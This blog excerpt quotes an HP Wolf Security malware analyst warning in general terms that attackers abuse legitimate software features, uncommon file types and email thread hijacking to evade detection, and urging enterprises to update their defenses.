Alex Holland, senior malware analyst at HP Wolf Security said, "Abusing legitimate features in the software to hide from detection tools is a common tactic for attackers, as is using uncommon file types that may be allowed past email gateways. Security teams need to ensure they are not relying on detection alone and that they are keeping up with the latest threats and updating their defenses accordingly…” 

"…Attackers are continually innovating to find new techniques to evade detection, so it's vital that enterprises plan and adjust their defenses based on the threat landscape and the business needs of their users. Threat actors have invested in techniques such as email thread hijacking, making it harder than ever for users to tell friend from foe," he added.
Read more »
Subscribe to: Posts (Atom)